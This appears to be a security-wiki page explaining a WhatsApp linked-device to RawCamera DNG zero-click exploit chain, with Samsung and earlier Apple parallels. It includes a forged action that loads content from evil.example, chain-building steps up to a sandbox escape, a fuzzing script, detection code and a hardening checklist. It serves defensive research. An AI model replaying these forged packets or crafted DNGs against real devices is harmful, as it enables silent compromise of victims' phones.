Zero-click Messaging → Image Parser Chains

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE). Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

TL;DR

  • Treat messaging-app multi-device/companion protocols as remote-control channels: fields the client assumes come from a trusted, paired device may in fact be attacker-controlled, and can often be sent directly to a victim to force content loading with zero user interaction.
  • Once any app can be coerced into fetching untrusted media, target the shared OS media pipeline (RawCamera on iOS/macOS, vendor parsers on Android OEM builds) with malformed files to pivot out of the sandbox.
  • The DNG-based RawCamera and Samsung parser bugs discussed here are concrete examples, but the full technique is a reusable blueprint for chaining a logic flaw → image-parser memory corruption → full device compromise.

Remote content loading via WhatsApp linked-device commands

Attack surface recap

The WhatsApp “linked devices” architecture keeps the primary phone and every companion (desktop, tablet, secondary phone) in sync via encrypted, structured protocol messages. Each message encodes:

  • Device metadata (device ID, capabilities, feature flags).
  • Action descriptors (e.g., sync chats, fetch thumbnails, render remote content).
  • Arbitrary parameters such as URIs, MIME hints, pagination keys, etc.

On Apple clients, the handler that processes these linked-device control packets implicitly trusted that a valid pairing already occurred, so high-impact fields (e.g., resource_url, open_media, sync_snapshot) were only minimally validated. A malicious companion message could therefore:

  1. Be routed to any account identified by its phone number.
  2. Survive the transport stack (Noise protocol + WhatsApp protobuf framing) because the receiver never verified that the sender was a legitimately paired device.
  3. Reach the iOS client, where the vulnerable code path automatically triggered a background HTTP(S) request to the attacker URL and parsed the response in a hidden WebView/media renderer.

Practical workflow for auditors

  1. Capture legitimate linked-device traffic. Attach a debugger or Frida script to the desktop/iOS client and hook the post-decryption handler (e.g., LinkedDevicesSyncHandler::processAction). Dump decoded protobuf payloads to learn available action types and parameters.
  2. Identify fields that cross trust boundaries. Any action carrying http_url, thumbnail_uri, download_url, or render_html parameters without strict allow-lists is a candidate remote-content primitive.
  3. Forge a malicious action. Reuse the observed protobuf schema and modify only the attacker-controlled fields. A simplified JSON view of the relevant logical structure is shown below (the actual transport is protobuf/Noise, but the semantic fields match):
     {
       "op": "sync_action",
       "device_id": "<attacker-companion>",
       "payload": {
         "target": "content_sync",
         "resource_url": "https://evil.example/payload.html",
         "media_type": "image/dng",
         "flags": ["background_fetch", "render_inline"]
       }
     }
  4. Deliver to the victim. Replay the forged packet through the same WhatsApp service that normally carries linked-device traffic (for example, using a modified desktop client or a custom Noise client that reuses the attacker's own account keys). Because CVE-2025-55177 failed to bind actions to authorized devices, the victim's iOS/macOS client would decode the message and immediately fetch the attacker URL without showing any UI.
  5. Instrument the fetch. Watch the forced HTTP(S) request and the internal renderer (WKWebView/ImageIO). At this point you have a zero-click web-delivery primitive inside WhatsApp.
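The workflow above, as an added example that is not WhatsApp's code or part of the original page: it walks a decoded action (the JSON shape shown in step 3) to flag fields that cross the trust boundary (step 2), then models the incomplete-authorization bug class beside a hardened handler. The paired device id, the allow-listed media host and the MIME list are assumptions for illustration; the real client keys these decisions off the pairing store and the Noise session, and the hardened version deliberately takes the sender identity from the authenticated transport rather than from the message body, because a `device_id` copied out of the packet is attacker-chosen.

```python
import re
from urllib.parse import urlsplit

# Constructed example: the logical view of a forged "content_sync" action, matching the
# JSON shape in step 3. The real transport is Noise + protobuf; only the semantics matter here.
FORGED_ACTION = {
    "op": "sync_action",
    "device_id": "<attacker-companion>",
    "payload": {
        "target": "content_sync",
        "resource_url": "https://evil.example/payload.html",
        "media_type": "image/dng",
        "flags": ["background_fetch", "render_inline"],
    },
}

# Assumption: the victim's legitimately paired companion ids (hypothetical value).
PAIRED_DEVICE_IDS = {"companion-desktop-7f3a"}
# Assumption: hosts and MIME types the client is allowed to fetch/render (hypothetical values).
ALLOWED_MEDIA_HOSTS = {"mmg.whatsapp.net"}
ALLOWED_MIME = {"image/jpeg", "image/png", "image/webp"}

# Field names treated, during triage, as remote-content references.
REMOTE_FIELD_RE = re.compile(r"(url|uri|href|html)$", re.IGNORECASE)


def find_remote_content_fields(msg, path=""):
    """Recursively walk a decoded action and return (dotted.path, value) for every field whose
    name looks like a remote-content reference and whose value parses as an http(s) URL."""
    hits = []
    if isinstance(msg, dict):
        for key, value in msg.items():
            hits.extend(find_remote_content_fields(value, f"{path}.{key}" if path else key))
    elif isinstance(msg, list):
        for i, value in enumerate(msg):
            hits.extend(find_remote_content_fields(value, f"{path}[{i}]"))
    elif isinstance(msg, str):
        leaf = path.rsplit(".", 1)[-1]
        if REMOTE_FIELD_RE.search(leaf) and urlsplit(msg).scheme in ("http", "https"):
            hits.append((path, msg))
    return hits


def handle_action_vulnerable(action):
    """Models the CVE-2025-55177 bug class: the handler checks that the action is well-formed
    and assumes pairing already happened, never that *this* sender is a paired device."""
    payload = action.get("payload", {})
    if action.get("op") == "sync_action" and payload.get("target") == "content_sync":
        return ("fetch", payload.get("resource_url"))  # background fetch of whatever was sent
    return ("ignore", None)


def handle_action_hardened(action, sender_id, paired=PAIRED_DEVICE_IDS,
                           allowed_hosts=ALLOWED_MEDIA_HOSTS):
    """Same action, but every trust-crossing field is checked before any I/O. sender_id is the
    identity established by the authenticated transport session, not a field from the message."""
    if sender_id not in paired:
        return ("reject", "sender is not a paired device")
    if action.get("device_id") != sender_id:
        return ("reject", "device_id in message does not match transport identity")
    payload = action.get("payload", {})
    if action.get("op") != "sync_action" or payload.get("target") != "content_sync":
        return ("ignore", None)
    url = payload.get("resource_url", "")
    parts = urlsplit(url)
    if parts.scheme != "https" or parts.hostname not in allowed_hosts:
        return ("reject", f"resource host not allow-listed: {parts.hostname}")
    if payload.get("media_type") not in ALLOWED_MIME:
        return ("reject", f"media type not allow-listed: {payload.get('media_type')}")
    return ("fetch", url)


if __name__ == "__main__":
    print(find_remote_content_fields(FORGED_ACTION))
    print(handle_action_vulnerable(FORGED_ACTION))
    print(handle_action_hardened(FORGED_ACTION, sender_id="<attacker-companion>"))
```

Running the script against the forged action reports `payload.resource_url` as the only trust-crossing field, shows the vulnerable handler issuing the fetch, and shows the hardened handler rejecting it on the pairing check before the URL is ever looked at.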

Weaponizing auto-decoded DNGs against RawCamera

Once the attacker controls what WhatsApp loads, the next goal is to make iOS/macOS parse a malicious Digital Negative (DNG) file with the RawCamera framework. Any embedded <img>/CSS URL that resolves to a .dng will be passed to the system image pipeline, invoking RawCamera even if WhatsApp itself never handled DNGs explicitly.

Triggering RawCamera from WhatsApp

  • Serve HTML that references the DNG via multiple mechanisms (e.g., <img src="evil.dng">, CSS background-image: url('evil.dng'), or <picture> sources) to cover different render paths.
  • Ensure correct MIME (image/x-adobe-dng) and small previews so the loader does not bail early because of size heuristics.
  • The iOS media sandbox will stream the file into RawCamera via CGImageSourceCreateWithURL, eventually hitting the vulnerable decoder.

Crafting memory-corrupting DNGs (CVE-2025-43300 style)

The 2025 in-the-wild bug was more specific than a generic malformed TIFF: the DNG carried JPEG-Lossless image data whose internal SOF3 component count disagreed with the TIFF/DNG metadata (SamplesPerPixel). In practice, RawCamera could size some buffers from the outer TIFF fields and later trust the embedded JPEG-Lossless stream while decoding, yielding the out-of-bounds write fixed in iOS 18.6.2 / iPadOS 18.6.2 on August 20, 2025.

That gives auditors a much tighter triage rule than “mutate random tags”:

exiftool -s -SamplesPerPixel -BitsPerSample -Compression poc.dng   # outer TIFF/DNG view
python3 - <<'PY'
# Inner JPEG-Lossless view: SOF3 = FF C3, followed by Lf(2) P(1) Y(2) X(2) Nf(1),
# so the component count Nf sits 9 bytes after the marker. data.index() takes the
# first FF C3 in the file, which is fine for a single-tile PoC but not for multi-tile files.
from pathlib import Path
data = Path('poc.dng').read_bytes()
sof3 = data.index(b'\xff\xc3')
print('SOF3 components =', data[sof3 + 9])
PY

If SamplesPerPixel and the SOF3 component count disagree, you are very close to the actual primitive publicly discussed for CVE-2025-43300. The usual neighbouring fields worth fuzzing once you have the parsing path are:

  • Tile/strip descriptors: keep TileByteCounts/StripByteCounts at legitimate values but bump TileOffsets so they reference regions outside the allocated buffer.
  • Sub-IFD chains: insert secondary images whose ImageWidth/ImageLength and BitsPerSample contradict each other, so RawCamera sizes a small buffer while later stages use attacker-controlled dimensions.
  • Opcode metadata: alter OpcodeList3 entries so per-row processing runs with attacker-chosen indices.
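The two-line triage above relies on the first FF C3 in the file; the following added example (not code from the page, Apple, or any published PoC) does the same comparison properly for the general case: it parses IFD0 of the TIFF/DNG container, follows the first TileOffsets/StripOffsets entry to the embedded JPEG stream, walks the marker segments to SOF3, and compares Nf with the outer SamplesPerPixel. The `build_test_dng` helper is a constructed fixture whose tile holds only SOI + SOF3 + EOI; it is not a valid camera file and exists only so the checker can run offline. Pointing `check_dng` at a real `poc.dng` is the intended use.

```python
import struct

# TIFF/DNG tag numbers used below (TIFF 6.0 / DNG specification values).
TAG_BITS_PER_SAMPLE, TAG_COMPRESSION, TAG_SAMPLES_PER_PIXEL = 258, 259, 277
TAG_STRIP_OFFSETS, TAG_STRIP_BYTE_COUNTS = 273, 279
TAG_TILE_OFFSETS, TAG_TILE_BYTE_COUNTS = 324, 325
TYPE_FMT = {1: "B", 3: "H", 4: "I"}  # BYTE, SHORT, LONG; other entry types are skipped


def read_ifd0(data):
    """Parse IFD0 of a TIFF/DNG container into {tag: [values]} for BYTE/SHORT/LONG entries."""
    endian = {b"II": "<", b"MM": ">"}.get(data[:2])
    if endian is None or struct.unpack(endian + "H", data[2:4])[0] != 42:
        raise ValueError("not a TIFF container")
    ifd = struct.unpack(endian + "I", data[4:8])[0]
    count = struct.unpack(endian + "H", data[ifd:ifd + 2])[0]
    tags = {}
    for i in range(count):
        entry = ifd + 2 + 12 * i
        tag, typ, n = struct.unpack(endian + "HHI", data[entry:entry + 8])
        if typ not in TYPE_FMT:
            continue
        size = struct.calcsize(TYPE_FMT[typ]) * n
        # Values of four bytes or fewer live inline in the entry; larger ones sit at an offset.
        src = entry + 8 if size <= 4 else struct.unpack(endian + "I", data[entry + 8:entry + 12])[0]
        tags[tag] = list(struct.unpack(endian + TYPE_FMT[typ] * n, data[src:src + size]))
    return tags


def sof3_components(jpeg):
    """Walk JPEG marker segments and return Nf from the SOF3 (lossless) frame header,
    or None if no SOF3 appears before the first scan or EOI."""
    pos = 0
    while pos + 2 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError("lost marker sync at offset %d" % pos)
        marker = jpeg[pos + 1]
        if marker == 0xFF:                                              # fill byte
            pos += 1
            continue
        if marker in (0xD8, 0x01) or 0xD0 <= marker <= 0xD7:            # SOI, TEM, RSTn: no payload
            pos += 2
            continue
        if marker == 0xD9 or pos + 4 > len(jpeg):                       # EOI or truncated
            return None
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xC3:            # SOF3 payload: P(1) Y(2) X(2) Nf(1) + 3 bytes per component
            return seg[5]
        if marker == 0xDA:            # SOS without a lossless frame header
            return None
        pos += 2 + length
    return None


def check_dng(data):
    """Compare the outer SamplesPerPixel with Nf inside the first tile/strip's JPEG stream."""
    tags = read_ifd0(data)
    offsets = tags.get(TAG_TILE_OFFSETS) or tags.get(TAG_STRIP_OFFSETS)
    counts = tags.get(TAG_TILE_BYTE_COUNTS) or tags.get(TAG_STRIP_BYTE_COUNTS)
    if not offsets or not counts:
        raise ValueError("IFD0 carries no tile or strip data")
    result = {
        "samples_per_pixel": tags.get(TAG_SAMPLES_PER_PIXEL, [1])[0],
        "bits_per_sample": tags.get(TAG_BITS_PER_SAMPLE, [8])[0],
        "compression": tags.get(TAG_COMPRESSION, [1])[0],
        "sof3_components": None,
    }
    if result["compression"] == 7:  # TIFF/EP "JPEG", the value DNG uses for lossless-JPEG tiles
        result["sof3_components"] = sof3_components(data[offsets[0]:offsets[0] + counts[0]])
    nf = result["sof3_components"]
    result["mismatch"] = nf is not None and nf != result["samples_per_pixel"]
    return result


def build_test_dng(samples_per_pixel, sof3_nf, width=16, height=16):
    """Constructed fixture: a minimal little-endian TIFF with one JPEG-compressed CFA tile whose
    stream is just SOI + SOF3 + EOI. Enough to exercise check_dng, not a decodable image."""
    comps = b"".join(bytes([i + 1, 0x11, 0]) for i in range(sof3_nf))
    sof3 = b"\xff\xc3" + struct.pack(">HBHHB", 8 + 3 * sof3_nf, 16, height, width, sof3_nf) + comps
    tile = b"\xff\xd8" + sof3 + b"\xff\xd9"
    entries = [  # (tag, type, count, value) in ascending tag order, as TIFF requires
        (256, 4, 1, width), (257, 4, 1, height), (258, 3, 1, 16), (259, 3, 1, 7),
        (262, 3, 1, 32803), (277, 3, 1, samples_per_pixel), (322, 4, 1, width),
        (323, 4, 1, height), (324, 4, 1, 0), (325, 4, 1, len(tile)),
    ]
    entries[8] = (324, 4, 1, 8 + 2 + 12 * len(entries) + 4)  # the tile follows the IFD
    ifd = struct.pack("<H", len(entries))
    for tag, typ, n, value in entries:
        if typ == 3:
            ifd += struct.pack("<HHIHH", tag, typ, n, value, 0)  # SHORT padded to the 4-byte slot
        else:
            ifd += struct.pack("<HHII", tag, typ, n, value)
    ifd += struct.pack("<I", 0)  # no next IFD
    return b"II*\x00" + struct.pack("<I", 8) + ifd + tile


if __name__ == "__main__":
    print(check_dng(build_test_dng(samples_per_pixel=1, sof3_nf=2)))
```

Only the first tile is inspected; for a multi-tile file every tile stream carries its own SOF3, so a real triage pass should loop over all TileOffsets/TileByteCounts pairs and report any tile whose Nf disagrees with the IFD.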

A basic mutation harness to hunt for such corruptions can be built around macOS, since the same RawCamera code ships on macOS/iOS/iPadOS:

#!/bin/bash
# Mutate each corpus DNG and push it through the system image pipeline.
# RawCamera.bundle is an ImageIO plug-in, not a stand-alone binary, so sips
# (an Apple CLI that decodes through ImageIO) is used as the loader.
set -u
mkdir -p crashes; i=0
export MallocScribble=1 MallocGuardEdges=1   # cheap heap-corruption detection
for sample in corpus/*.dng; do
  i=$((i + 1))
  radamsa "$sample" > /tmp/poc.dng
  sips -s format png /tmp/poc.dng --out /tmp/out.png >/tmp/out 2>&1
  rc=$?
  # A decode error exits with a small code; death by signal (SIGSEGV/SIGBUS/SIGABRT) exits 128+N.
  [ "$rc" -ge 128 ] && cp /tmp/poc.dng "crashes/$(basename "$sample" .dng)-$i-rc$rc.dng"
done

Every RawCamera crash hands you a new primitive. The published PoC reached an out-of-bounds read/write reliable enough to crash WhatsApp on iPhone, iPad, and Mac.

Building the 0-click chain

  1. Linked-device packet → forces WhatsApp to download https://evil.example/payload.html without anyone touching the device.
  2. Payload HTML → silently references evil.dng, ensuring the OS media stack invokes RawCamera.
  3. Malicious DNG → uses crafted tags to trigger the RawCamera OOB and crash or take over the image decoder.
  4. Post-corruption exploitation → add info-leak gadgets (for example, abusing predictable heap metadata) and stage a ROP/JOP chain to break out of the WhatsApp sandbox and reach a more privileged context.

Because every step is automatic, the attacker needs only the victim's phone number. No notification, banner, or prompt is shown on the target device.

Recent Apple parser-chain patterns worth reusing

This WhatsApp → DNG → RawCamera chain follows the same pattern seen in recent Apple zero-click campaigns: find an alternate attachment wrapper that reaches a less-constrained parser, then use a file type the OS previews eagerly.

  • BLASTPASS (September 7, 2023 / iOS 16.6.1): Citizen Lab reported malicious PassKit attachments containing images, and Apple patched Wallet (CVE-2023-41061) together with ImageIO (CVE-2023-41064). Project Zero's later analysis showed why this matters in practice: the attacker needed not just a parser bug but also a container that moved image parsing out of the usual BlastDoor path into a different process. When auditing messaging apps, enumerate every attachment type that triggers background previews in helper daemons (.pkpass, contact cards, sticker bundles, inline HTML, QuickLook previews), not only the obvious image attachments.
  • TRIANGULATION (patched in iOS 15.7.8 on July 24, 2023, with the mainline fix already in iOS 16.3): Kaspersky showed that a malicious iMessage attachment reached an undocumented Apple-only ADJUST TrueType instruction (CVE-2023-41990). The practical lesson is that fonts are image-parser cousins for zero-click work: rich-text previews, font fallback, and thumbnail generation can all be parser entry points even when the app claims to support only "documents" or "stickers".

The recurring audit question is therefore: which message types cause silent parsing in a process other than the visible chat renderer? That is usually where the chain starts. For sample triage and format inspection once you have a suspicious file, reuse the generic structural file-format detection page.

Samsung vendor image parser parallels

Samsung's bulletin for CVE-2025-21043 confirmed that its proprietary image-parsing stack (used by Gallery, Messages, and indirectly by WhatsApp) had an out-of-bounds write reachable through untrusted media. The exploitation methodology mirrors the Apple chain:

  • Identify an auto-preview vector (chat thumbnails, notification previews, share sheets) that parses the attacker's file with Samsung's libimagecodec/libOneUI_ImageDecoder libraries.
  • Diff OEM library updates or fuzz the parsers with malformed RAW/DNG files until you see memory corruption comparable to the RawCamera crash (heap metadata clobber, register control, etc.).
  • Deliver the crafted file through any channel that already auto-loads content (for example, the same linked-device primitive, WhatsApp preview fetchers, or Android's push-to-talk waveform previews).

Once an OOB write lands in the vendor parser, combining it with the WhatsApp auto-fetch primitive yields another zero-click chain on Samsung devices.

Testing & hardening checklist

  • Protocol validation: enforce strict allow-lists for every linked-device action. Companion commands that request fetch/render must prove device pairing (sign the payload), and the URL must match an allow-list or be a signed blob.
  • Transport replay countermeasures: bind every action to a per-device key and drop packets whose sender key is unknown, even when the protobuf syntax is valid.
  • Media pipeline restrictions: high-level apps should accept only approved MIME types and explicitly reject RAW/DNG unless the feature is required.
  • Parser fuzzing regression tests: keep corpora of malformed RAW/DNG files and run them against RawCamera/vendor decoders after every update.
  • Crash triage automation: attach DYLD_INSERT_LIBRARIES sanitizers or MTE on fuzzing devices to catch subtle OOB conditions before attackers do.
